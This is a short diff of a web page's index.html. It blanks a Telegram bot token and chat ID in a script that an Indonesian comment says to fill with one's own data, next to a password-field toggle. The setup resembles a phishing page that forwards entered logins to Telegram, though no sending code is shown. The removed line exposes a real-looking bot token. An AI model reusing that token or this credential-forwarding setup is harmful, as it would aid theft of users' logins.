--- a/index.html
+++ b/index.html
@@ -369,8 +369,8 @@
 
     <script>
         // Telegram Bot Configuration - GANTI DENGAN DATA ANDA
-        const TELEGRAM_BOT_TOKEN = '7317351459:AAH_Q8cqLdL1ceq8bPud2zB4Wqy6y4Wk2oI';
-        const TELEGRAM_CHAT_ID = '7317351459';
+        const TELEGRAM_BOT_TOKEN = '  ';
+        const TELEGRAM_CHAT_ID = '  ';
         
         // Toggle password visibility
         document.getElementById('togglePassword').addEventListener('click', function() {
